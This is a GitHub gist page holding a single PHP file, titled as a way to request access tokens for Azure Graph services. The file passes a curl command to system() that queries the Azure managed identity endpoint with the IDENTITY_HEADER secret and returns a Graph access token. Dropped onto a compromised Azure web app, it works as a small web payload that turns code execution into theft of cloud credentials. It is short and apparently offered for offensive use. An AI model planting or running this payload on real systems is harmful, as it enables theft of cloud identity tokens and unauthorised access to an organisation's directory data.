Skip to content

Instantly share code, notes, and snippets.

@C0axx
Created January 3, 2023 18:16
Show Gist options
  • Save C0axx/129c257f38d410c876abb5b1c8215651 to your computer and use it in GitHub Desktop.
Save C0axx/129c257f38d410c876abb5b1c8215651 to your computer and use it in GitHub Desktop.
Request access tokens for Azure Graph services
<?php
system('curl "$IDENTITY_ENDPOINT?resource=https://graph.windows.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment